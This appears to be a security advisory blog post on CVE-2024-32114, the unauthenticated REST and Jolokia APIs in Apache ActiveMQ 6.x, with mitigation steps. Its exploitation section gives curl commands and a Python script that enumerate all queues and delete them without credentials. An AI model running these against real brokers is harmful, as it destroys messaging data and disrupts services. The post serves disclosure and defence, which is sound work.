If you’re running Apache ActiveMQ 6.x, you should be aware of a serious security vulnerability, CVE-2024-32114, affecting the platform’s REST API interfaces. In this long read, we’ll break down what the vulnerability is, show how it can be exploited, and give you simple, direct guidance to secure your setup—plus links to official resources.
What Is CVE-2024-32114?
CVE-2024-32114 is a security flaw in the default configuration of Apache ActiveMQ 6.x. Out of the box, the web context for APIs—specifically the Jolokia JMX REST API and the Message REST API—is left unsecured. There’s no authentication required by default. That means: Anyone with access can interact with sensitive management APIs and messaging endpoints without logging in.
Unauthenticated access to broker management via the Jolokia JMX REST API.
- Ability to send or consume messages, purge queues, or delete message destinations using the Message REST API.
If your broker is exposed to any network (even internal!), this is pretty much handing over the keys to your message broker to anyone who tries.
_a) Jolokia JMX REST API Example_
The Jolokia API provides a RESTful interface to JMX MBeans—for monitoring and management. With default settings on 6.x, anybody can call:
curl http://YOUR_ACTIVEMQ_SERVER:8161/api/jolokia/read/org.apache.activemq:type=Broker,brokerName=localhost
You can directly send or receive messages via the REST API. For instance, to delete a queue
curl -X DELETE http://YOUR_ACTIVEMQ_SERVER:8161/api/message/QUEUE_NAME?type=queue
Or, to send a message
curl -X POST "http://YOUR_ACTIVEMQ_SERVER:8161/api/message/EXAMPLE.QUEUE?type=queue"; \
-d "Hello, Exploited World!"
None of these operations ask for a username or password by default. That means any attacker can disrupt your messaging system just by knowing its address.
A dangerous scenario would be a script like
import requests
BROKER_HOST = "http://YOUR_ACTIVEMQ_SERVER:8161";
r = requests.get(f"{BROKER_HOST}/api/jolokia/read/org.apache.activemq:type=Broker,brokerName=localhost,destinationType=Queue,destinationName=*")
for queue in r.json().get("value", {}):
qname = queue.split(",")[-1].split("=")[1]
requests.delete(f"{BROKER_HOST}/api/message/{qname}?type=queue")
print("All queues purged!")
Who’s Affected?
All Apache ActiveMQ 6.x installs (older than 6.1.2) using the default configuration are affected. The API endpoints are typically accessible at http://<your-activemq-host>:8161/api/.
How To Fix: Immediate Mitigation
### 1. Update your conf/jetty.xml to Require Authentication
Edit conf/jetty.xml and add the following bean configuration to secure the API context
<bean id="securityConstraintMapping" class="org.eclipse.jetty.security.ConstraintMapping">
<property name="constraint" ref="securityConstraint" />
<property name="pathSpec" value="/" />
</bean>
This will force authentication for all API web contexts, including /api/jolokia and /api/message.
Don’t forget: You’ll need to set up user credentials as well, so the authentication challenge will actually work.
2. Best Solution: Upgrade to 6.1.2 or Later
The Apache team released ActiveMQ 6.1.2 which fixes the default configuration. Upgrading closes the vulnerability immediately.
Official References and Further Reading
- Apache ActiveMQ CVE-2024-32114 Security Advisory
- ActiveMQ Project Homepage
- Download Apache ActiveMQ
Anyone can manage your broker, consume or send messages, or delete queues if your broker is exposed.
- Edit your jetty.xml to enforce authentication, or upgrade to 6.1.2+ for a secure-by-default installation.
Act now: A quick config change or upgrade is all it takes. Don’t risk unauthorized access to your messaging infrastructure! If you want to see if you’re vulnerable, simply try accessing http://YOUR_ACTIVEMQ_SERVER:8161/api/jolokia/ from your browser or with curl—if you don’t see a login prompt, you’re exposed.
Timeline
Published on: 05/02/2024 09:15:06 UTC
Last modified on: 05/02/2024 13:27:25 UTC